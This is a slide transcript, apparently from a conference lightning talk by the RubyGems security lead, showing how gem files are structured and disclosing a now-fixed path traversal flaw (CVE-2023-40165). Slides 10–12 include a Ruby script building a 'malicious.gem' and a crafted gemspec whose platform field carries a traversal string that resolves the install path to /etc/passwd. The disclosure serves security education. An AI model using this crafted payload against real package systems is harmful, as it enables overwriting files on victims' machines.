Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Building Broken Gems

Samuel E. Giddins
October 06, 2023
Technology
0
34

Building Broken Gems

Lightning talk given at Rocky Mountain Ruby 2023

Samuel E. Giddins

October 06, 2023
Tweet

More Decks by Samuel E. Giddins

See All by Samuel E. Giddins
Handling 225k requests per second to RubyGems.org
segiddins
0
33
State of the RubyGems 2023
segiddins
0
54
Switching Disciplines as a Tech Lead
segiddins
0
26
Source Code to Executable
segiddins
0
69
Empowering iOS Developers
segiddins
1
65
Empowering iOS Developers
segiddins
0
350
Making CocoaPods Fast (with Modern Ruby Tooling)
segiddins
0
25
Making CocoaPods Fast
segiddins
0
280
Answering the Existential Question
segiddins
0
39

Other Decks in Technology

See All in Technology
Azure Container Apps + Bicep 〜 こんな感じで運用しています
kaz29
3
540
EM完全に理解した と思ったけど、 やっぱり何も分からなかった話 / EM Night Fukuoka #1
hirutas
0
110
Tellus の衛星データを見てみよう #mf_fukuoka
kongmingstrap
0
230
家族アルバム みてねにおけるGrafana活用術 / Grafana Meetup Japan Vol.1 LT
isaoshimizu
1
820
ServiceNow Knowledge 24の歩き方 EYストラテジー・アンド・コンサルティング
manarobot
0
200
サーバー間 GraphQL と webmock-graphql の話 / server-to-server graphql and webmock-graphql
qsona
2
190
推しは推せるときに推せ! プロダクトにフィードバックしていこう
nakasho
0
380
Reducing Cross-Zone Egress at Spotify with Custom gRPC Load Balancing Recap
koh_naga
0
210
アクセシビリティを考慮したUI/CSSフレームワーク・ライブラリ選定
yajihum
2
1k
Gitlab本から学んだこと - そーだいなるプレイバック / gitlab-book
soudai
4
440
AOAI をきっかけに​ 社内の Azure 管理を見直した話​
recruitengineers
PRO
1
360
今日からできる!簡単 .NET 高速化 Tips -2024 edition-
xin9le
3
1k

Featured

See All Featured
Documentation Writing (for coders)
carmenintech
60
3.9k
XXLCSS - How to scale CSS and keep your sanity
sugarenia
241
1.2M
In The Pink: A Labor of Love
frogandcode
138
21k
Testing 201, or: Great Expectations
jmmastey
28
6.4k
Cheating the UX When There Is Nothing More to Optimize - PixelPioneers
stephaniewalter
274
13k
How To Stay Up To Date on Web Technology
chriscoyier
782
250k
What's new in Ruby 2.0
geeforr
337
31k
Bash Introduction
62gerente
604
210k
The Psychology of Web Performance [Beyond Tellerrand 2023]
tammyeverts
6
1.5k
Done Done
chrislema
178
15k
We Have a Design System, Now What?
morganepeng
43
6.8k
What’s in a name? Adding method to the madness
productmarketing
PRO
16
2.6k

Transcript

  1. HOW TO BOIL WATER 1 — segiddins @ Rocky Mountain

    Ruby 2023

  2. BUILDING BROKEN GEMS 2 — segiddins @ Rocky Mountain Ruby

    2023

  3. SAMUEL GIDDINS SECURITY LEAD, RUBYGEMS RUBY CENTRAL 3 — segiddins

    @ Rocky Mountain Ruby 2023

  4. WHAT IS A GEM? $ gem build rails.gemspec Successfully built

    RubyGem Name: rails Version: 7.1.0.beta1 File: rails-7.1.0.beta1.gem 4 — segiddins @ Rocky Mountain Ruby 2023

  5. WHAT IS A GEM? $ file rails-7.1.0.beta1.gem rails-7.1.0.beta1.gem: POSIX tar

    archive 5 — segiddins @ Rocky Mountain Ruby 2023

  6. WHAT IS A GEM? $ tar --list -f rails-7.1.0.beta1.gem metadata.gz

    data.tar.gz checksums.yaml.gz 6 — segiddins @ Rocky Mountain Ruby 2023

  7. WHAT IS A GEM? $ tar --extract \ --file rails-7.1.0.beta1.gem

    \ -O metadata.gz | \ gunzip --- !ruby/object:Gem::Specification name: rails version: !ruby/object:Gem::Version version: 7.1.0.beta1 platform: ruby authors: - David Heinemeier Hansson autorequire: bindir: bin cert_chain: [] date: 2023-10-06 00:00:00.000000000 Z dependencies: [...] description: "..." email: [email protected] executables: [] extensions: [] extra_rdoc_files: [] files: [MIT-LICENSE, README.md] homepage: https://rubyonrails.org licenses: [MIT] metadata: { ... } rdoc_options: [] require_paths: [lib] 7 — segiddins @ Rocky Mountain Ruby 2023

  8. BUT SAMUEL... YOU SAID YOU'RE A SECURITY ENGINEER! 8 —

    segiddins @ Rocky Mountain Ruby 2023

  9. Indeed I am. 9 — segiddins @ Rocky Mountain Ruby

    2023

  10. LET'S PACKAGE OUR OWN GEM #!/usr/bin/env ruby require 'rubygems' require

    'rubygems/package' require 'yaml' file_name = "malicious.gem" package = Gem::Package.new file_name File.open(file_name, "wb") do |file| Gem::Package::TarWriter.new(file) do |gem| gem.add_file "metadata.gz", 0o444 do |io| package.gzip_to(io) do |gz_io| gz_io.write "---!ruby/object:Gem::Specification\n..." end end gem.add_file "data.tar.gz", 0o444 do |io| package.gzip_to io do |gz_io| Gem::Package::TarWriter.new gz_io do |data_tar| # omitted end end end end end 10 — segiddins @ Rocky Mountain Ruby 2023

  11. ... WITH OUT OWN GEMSPEC --- !ruby/hash-with-ivars:Gem::Specification ivars: "@name": book

    "@version": "1" "@new_platform": !ruby/object:Gem::Platform os: "../../../../../../../../etc/passwd" "@original_platform": ruby "@summary": "malicious" "@authors": [[email protected]] 11 — segiddins @ Rocky Mountain Ruby 2023

  12. ... WHICH COULD BE PRETTY BAD TO INSTALL puts YAML.unsafe_load(spec).full_name

    puts File.expand_path( YAML.unsafe_load(spec).full_name, Gem::Specification.gems_dir # /Users/segiddins/.gem/ruby/3.2.2/gems/ ) book-1-../../../../../../../../etc/passwd /etc/passwd 12 — segiddins @ Rocky Mountain Ruby 2023

  13. ... AND PUSH IT TO RUBYGEMS.ORG $ gem push malicious.gem

    Pushing gem to https://rubygems.org... There was a problem saving your gem: Gem platform is invalid, The original platform ruby does not resolve the platform ../../../../../../../../etc/passwd (instead it is ruby) 13 — segiddins @ Rocky Mountain Ruby 2023

  14. ... OH YEAH, I FIXED THIS ONE. 14 — segiddins

    @ Rocky Mountain Ruby 2023

  15. CVE-2023-40165 https://github.com/rubygems/rubygems.org/security/advisories/ GHSA-rxcq-2m4f-94wm 15 — segiddins @ Rocky Mountain Ruby

    2023

  16. 16 — segiddins @ Rocky Mountain Ruby 2023

  17. WASN'T THAT FUN? 17 — segiddins @ Rocky Mountain Ruby

    2023

  18. @SEGIDDINS SUPPORT RUBY CENTRAL TO ALLOW ME TO KEEP FINDING

    & FIXING THESE VULNERABILITIES! 18 — segiddins @ Rocky Mountain Ruby 2023